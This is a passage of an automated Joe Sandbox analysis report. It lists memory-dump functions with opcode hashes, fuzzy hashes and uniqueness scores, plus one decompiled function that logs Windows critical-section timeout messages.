                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d5d306e97a306a93c7cb009ee1a78cabf465e8f2dd49fa91019148031c5715fd
                                          • Instruction ID: d078444510bf5e8258fd3dfeb7cd2f0a1c6dc44e6379b09204a2211d8bdd5b29
                                          • Opcode Fuzzy Hash: d5d306e97a306a93c7cb009ee1a78cabf465e8f2dd49fa91019148031c5715fd
                                          • Instruction Fuzzy Hash: F990027120504D42D14071998405B460115A7D0345F52C015A14546D4DD6658D55B7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E96D0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4518ff07ef4e62fa9ee2b760aaa1b8bbf840375e183d34a20e3a6121f06a0e7d
                                          • Instruction ID: b6ff12023a067fc6ebcceb03fd2c5b57cdf277ea4657820e12fe8dc75b2890cf
                                          • Opcode Fuzzy Hash: 4518ff07ef4e62fa9ee2b760aaa1b8bbf840375e183d34a20e3a6121f06a0e7d
                                          • Instruction Fuzzy Hash: 5B90027120100D42D10061998405B460105A7E0341F52C01AA1514694DC655C85176A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: ac3007332ac9e9c7c3def3549d4ebd9487e85b8eda7bba198d1977444ceafe38
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0113FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E0113FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E010ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01135720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01135720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                          0x0113fdda
                                          0x0113fde2
                                          0x0113fde5
                                          0x0113fdec
                                          0x0113fdfa
                                          0x0113fdff
                                          0x0113fe0a
                                          0x0113fe0f
                                          0x0113fe17
                                          0x0113fe1e
                                          0x0113fe19
                                          0x0113fe19
                                          0x0113fe19
                                          0x0113fe20
                                          0x0113fe21
                                          0x0113fe22
                                          0x0113fe25
                                          0x0113fe40

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0113FDFA
                                          Strings
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0113FE01
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0113FE2B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 91cb17781c880da99ee9745c343fcd2dbde8724a6ba93118884fd9cd5b4f935c
                                          • Instruction ID: a1a59fef2ab4ed6bf6fa36018c407a95dec12aa6626037815be9e60c19d32031
                                          • Opcode Fuzzy Hash: 91cb17781c880da99ee9745c343fcd2dbde8724a6ba93118884fd9cd5b4f935c
                                          • Instruction Fuzzy Hash: B3F0F672640602BFEB291A46DC06F63BF5BEB84B70F150314F6685A1E1DA62F82096F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%